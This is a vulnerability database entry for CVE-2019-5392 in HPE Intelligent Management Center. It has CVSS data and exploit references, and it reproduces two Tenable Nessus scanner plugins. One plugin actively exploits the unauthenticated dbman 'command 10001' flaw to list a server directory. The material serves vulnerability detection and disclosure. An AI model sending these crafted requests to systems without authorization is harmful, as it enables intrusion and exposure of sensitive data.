Vulnerabilities > CVE-2019-5392 - Unspecified vulnerability in HP Intelligent Management Center

047910
CVSS 5.3 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
LOW
Integrity impact
NONE
Availability impact
NONE
network
low complexity
hp
nessus
exploit available

Summary

A disclosure of information vulnerability was identified in HPE Intelligent Management Center (IMC) PLAT earlier than version 7.3 E0506P09.

Exploit-Db

idEDB-ID:47408
last seen2019-09-23
modified2019-09-23
published2019-09-23
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/47408
titleHPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure

Nessus

  • NASL familyMisc.
    NASL idHP_IMC_DBMAN_MULTI_VULNS_HPESBHF03930.NASL
    descriptionThe HPE Intelligent Management Center (iMC) dbman process running on the remote host is affected by multiple vulnerabilities: - A denial of service (DoS) vulnerability exists due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this issue, via a command 10014 request, to cause the dbman process to restart. (CVE-2018-7123) - A denial of service (DoS) vulnerability exists due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this issue, via a command 10003 request, to cause the dbman process to stop responding. (CVE-2019-5355) - A command injection vulnerability exists due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a series of specially crafted requests, to execute arbitrary commands. (CVE-2019-5390) - A stack-based buffer overflow condition exists due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a series of specially crafted requests, to cause a denial of service condition or the execution of arbitrary code. (CVE-2019-5391) - An information disclosure vulnerability exists due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a command 10001 request, to disclose potentially sensitive information. (CVE-2019-5392) - An information disclosure vulnerability exists due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a command 10002 request, to backup iMC database files to a directory that allows unauthenticated access over HTTP. (CVE-2019-5393) Note that the HPE iMC running on the remote host is reportedly affected by additional vulnerabilities; however, this plugin has not tested for these.
    last seen2020-06-01
    modified2020-06-02
    plugin id125736
    published2019-06-06
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/125736
    titleHPE Intelligent Management Center dbman Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    include("compat.inc");
    
    if (description)
    {
      script_id(125736);
      script_version("1.3");
      script_cvs_date("Date: 2020/02/11");
    
      script_cve_id(
        "CVE-2018-7123",
        "CVE-2019-5355",
        "CVE-2019-5390",
        "CVE-2019-5391",
        "CVE-2019-5392",
        "CVE-2019-5393"
        );
      script_xref(name:"TRA", value:"TRA-2018-28");
      script_xref(name:"TRA", value:"TRA-2019-12");
      script_xref(name:"HP", value:"HPESBHF03930");
    
      script_name(english:"HPE Intelligent Management Center dbman Multiple Vulnerabilities");
    
      script_set_attribute(attribute:"synopsis", value:
    "A database backup and restoration tool running on the remote host is
    affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The HPE Intelligent Management Center (iMC) dbman process running
    on the remote host is affected by multiple vulnerabilities:
    
      - A denial of service (DoS) vulnerability exists due to improper
        validation of user-supplied data. An unauthenticated, remote
        attacker can exploit this issue, via a command 10014 request, to
        cause the dbman process to restart. (CVE-2018-7123)
    
      - A denial of service (DoS) vulnerability exists due to improper
        validation of user-supplied data. An unauthenticated, remote
        attacker can exploit this issue, via a command 10003 request, to
        cause the dbman process to stop responding. (CVE-2019-5355)
    
      - A command injection vulnerability exists due to improper
        validation of user-supplied data. An unauthenticated, remote
        attacker can exploit this, via a series of specially crafted
        requests, to execute arbitrary commands. (CVE-2019-5390)
    
      - A stack-based buffer overflow condition exists due to improper
        validation of user-supplied data. An unauthenticated, remote
        attacker can exploit this, via a series of specially crafted
        requests, to cause a denial of service condition or the execution
        of arbitrary code. (CVE-2019-5391)
    
      - An information disclosure vulnerability exists due to improper
        validation of user-supplied data. An unauthenticated, remote
        attacker can exploit this, via a command 10001 request, to
        disclose potentially sensitive information. (CVE-2019-5392)
    
      - An information disclosure vulnerability exists due to improper
        validation of user-supplied data. An unauthenticated, remote
        attacker can exploit this, via a command 10002 request, to
        backup iMC database files to a directory that allows
        unauthenticated access over HTTP. (CVE-2019-5393)
    
    Note that the HPE iMC running on the remote host is reportedly
    affected by additional vulnerabilities; however, this plugin has
    not tested for these.");
      # https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03930en_us
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f3575044");
      script_set_attribute(attribute:"solution", value:
    "Upgrade HPE iMC version to 7.3 E0703 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2019-5390");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2019/03/20");
      script_set_attribute(attribute:"patch_publication_date", value:"2019/05/09");
      script_set_attribute(attribute:"plugin_publication_date", value:"2019/06/06");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:intelligent_management_center");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_dependencies("hp_imc_dbman_detect.nbin");
      script_require_ports("hpe_imc_dbman",2810);
      exit(0);
    }
    
    include('audit.inc');
    include('global_settings.inc');
    include('misc_func.inc');
    include('byte_func.inc');
    include('dump.inc');
    
    port = get_service(svc:'hpe_imc_dbman', default:2810, exit_on_fail:TRUE);
    soc = open_sock_tcp(port);
    if (!soc) audit(AUDIT_SOCK_FAIL, port);
    
    cmd = 10021; # get_version
    req = mkdword(cmd) + '\x00\x00\x00\x00';
    send(socket: soc, data: req);
    res = recv(socket: soc, length:256);
    err = socket_get_error(soc);
    close(soc);
    
    if(isnull(res))
    {
      # The dbman in iMC 7.3 E0705 or later treats command 10021
      # as an encrypted command. The first 4 bytes in the request
      # is a 32-bit length field. The dbman in these versions checks
      # if the length field is greater than 100. If so, it will close
      # the connection.
      #
      # Since we specified 10021 as the first 4 bytes in the request,
      # the dbman in these verions will return nothing and close
      # the connection.
      if(err == ECONNRESET)
        audit(AUDIT_HOST_NOT, 'affected');
    
      audit(AUDIT_RESP_NOT, port, 'a dbman command');
    }
    
    rlen = strlen(res);
    #
    # Patched dbman encrypts the command, so an error msg is returned:
    #
    # 0x00:  00 00 00 01 00 00 00 3A 30 38 02 01 FF 04 33 44    .......:08....3D
    # 0x10:  62 6D 61 6E 20 64 65 61 6C 20 6D 73 67 20 65 72    bman deal msg er
    # 0x20:  72 6F 72 2C 20 70 6C 65 61 73 65 20 74 6F 20 73    ror, please to s
    # 0x30:  65 65 20 64 62 6D 61 6E 5F 64 65 62 75 67 2E 6C    ee dbman_debug.l
    # 0x40:  6F 67
    #
    if('dbman_debug.log' >< res)
      audit(AUDIT_HOST_NOT, 'affected');
    #
    # Vulnerable dbman should return a response like this:
    #
    # 0x00:  00 00 27 25 00 00 00 07 30 05 04 03 37 2E 33       ..'%....0...7.3
    #
    else if (rlen > 8 &&
      # cmd must be in response
      getdword(blob:res, pos:0) == cmd &&
      # resp length field + 8 must be pkt_len
      getdword(blob:res, pos:4) + 8 == rlen &&
      # resp data must be an ASN sequence
      getbyte(blob:res, pos:8) == 0x30
    )
    {
      extra = 'Nessus was able to detect the vulnerabilities by sending a' +
        ' specially crafted dbman command to the remote host.';
      security_report_v4(port: port, severity: SECURITY_HOLE, extra: extra);
    }
    else
      audit(AUDIT_RESP_BAD, port, 'a dbman command. Response: \n' + hexdump(ddata:res));
    
  • NASL familyMisc.
    NASL idHP_IMC_DBMAN_CMD_10001_INFO_DISCLOSURE.NASL
    descriptionThe HPE Intelligent Management Center (iMC) dbman process running on the remote host is affected by an information disclosure vulnerability. An unauthenticated, remote attacker can exploit this, via a command 10001 request, to view the contents of arbitrary directories under the security context of the SYSTEM or root user. Note that the HPE iMC dbman process running on the remote host is reportedly affected by additional vulnerabilities; however, this plugin has not tested for these.
    last seen2020-06-01
    modified2020-06-02
    plugin id118038
    published2018-10-10
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/118038
    titleHPE Intelligent Management Center dbman Command 10001 Information Disclosure
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    include("compat.inc");
    
    if (description)
    {
      script_id(118038);
      script_version("1.4");
      script_cvs_date("Date: 2019/09/25 17:12:11");
    
      script_cve_id("CVE-2019-5392");
      script_xref(name:"TRA", value:"TRA-2018-28");
      script_xref(name:"HP", value:"HPESBHF03930");
    
      script_name(english:"HPE Intelligent Management Center dbman Command 10001 Information Disclosure");
      script_summary(english:"Attempts to fetch directory contents");
    
      script_set_attribute(attribute:"synopsis", value:
    "A database backup and restoration tool running on the remote host is
    affected by an information disclosure vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The HPE Intelligent Management Center (iMC) dbman process running
    on the remote host is affected by an information disclosure
    vulnerability. An unauthenticated, remote attacker can
    exploit this, via a command 10001 request, to view the contents of 
    arbitrary directories under the security context of the SYSTEM or
    root user.
    
    Note that the HPE iMC dbman process running on the remote host is
    reportedly affected by additional vulnerabilities; however, this
    plugin has not tested for these.");
      # https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03930en_us
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f3575044");
      script_set_attribute(attribute:"solution", value:
    "Upgrade HPE iMC version to 7.3 E0703 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2019-5392");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/10/10");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:intelligent_management_center");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_dependencies("hp_imc_dbman_detect.nbin");
      script_require_ports("hpe_imc_dbman",2810);
      exit(0);
    }
    
    include('audit.inc');
    include('byte_func.inc');
    include('global_settings.inc');
    include('misc_func.inc');
    include('kerberos_func.inc');
    
    ###
    #
    # Read a dbman response
    #
    # @param socket socket to read from
    #
    # @return ret['code'] - response code
    #         ret['data'] - response data
    #         NULL on error
    #
    ###
    function dbman_recv(socket)
    {
      local_var data, len, ret;
    
      # Read 4-byte code
      data = recv(socket:socket, length:4, min:4);
      if(isnull(data)) return NULL;
      ret['code'] = getdword(blob:data, pos:0);
    
      # Read 4-byte msg len
      data = recv(socket:socket, length:4, min:4);
      if(isnull(data)) return NULL;
      len = getdword(blob:data, pos:0);
    
      # Dubious msg len
      if(len > 0x10000) return NULL;
    
      # Read msg body
      data = NULL;
      if(len)
      {
        data = recv(socket:socket, length:len, min:len);
        if(isnull(data)) return NULL;
      }
      ret['data'] = data;
      return ret;
    }
    
    ###
    #
    # Parse command 10001 response
    #
    # @anonparam command 10001 response data
    #
    # @return parsed data
    #
    ###
    function get_dir_contents()
    {
      local_var data, ent, i, name, out, ret;
    
      data = _FCT_ANON_ARGS[0];
    
      # Parse the outer sequence
      ret = der_parse_data(tag:0x30,data:data);
      if(empty_or_null(ret)) return NULL;
    
      # Parse the embedded sequence, which holds a list of
      # directory entries
      ret = der_parse_sequence(seq:ret,list:TRUE);
      if(empty_or_null(ret)) return NULL;
    
      # A directory should not have more than 1000 entries
      if(ret[0] > 1000) return NULL;
    
      out = NULL;
      for (i = 1; i <= ret[0]; i++)
      {
        # Each directory entry is a sequence itself
        ent = ret[i];
        ent = der_parse_sequence(seq:ent,list:TRUE);
        if(empty_or_null(ent)) return NULL;
    
        # Each entry should have 3 elements 
        if(ent[0] != 3) return NULL;
    
        # The 'name' element 
        name = der_parse_octet_string(string: ent[1]);
        if(empty_or_null(name)) return NULL;
    
        out += name + '\n';
      }
      return out;
    }
    
    port = get_service(svc:'hpe_imc_dbman', default:2810, exit_on_fail:TRUE);
    soc = open_sock_tcp(port);
    if (!soc) audit(AUDIT_PORT_CLOSED, port);
    
    
    data = der_encode_int (i:1) + # flag
           # Query the current directory of the dbman process
           der_encode_octet_string(string:".");
    opcode = 10001;
    
    seq = der_encode (tag:0x30, data: data);
    req = mkdword(opcode) + mkdword(strlen(seq)) + seq;
    send(socket: soc, data: req);
    res = dbman_recv(socket: soc);
    close(soc);
    
    if(! isnull(res) &&
       ! isnull(res['data']) &&
        # The current directory should contain the dbman executable
       'dbman' >< res['data'] &&
        # Corretly extract the directory contents so that we can show
        # to the user that the info disclosure vuln indeed exists.
       !isnull((ret = get_dir_contents(res['data'])))
      )
    {
      report =
        'Nessus was able to get the contents of the current directory of the ' +
        'dbman process: \n' +
        '\n' +
        ret;
    
      security_report_v4(
        port        : port,
        severity    : SECURITY_WARNING,
        extra       : report
      );
    }
    else
    {
      audit(AUDIT_HOST_NOT, 'affected');
    }
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/154580/hpeimc-disclose.txt
idPACKETSTORM:154580
last seen2019-09-24
published2019-09-23
reporterRishabh Sharma
sourcehttps://packetstormsecurity.com/files/154580/HPE-Intelligent-Management-Center-Information-Disclosure.html
titleHPE Intelligent Management Center Information Disclosure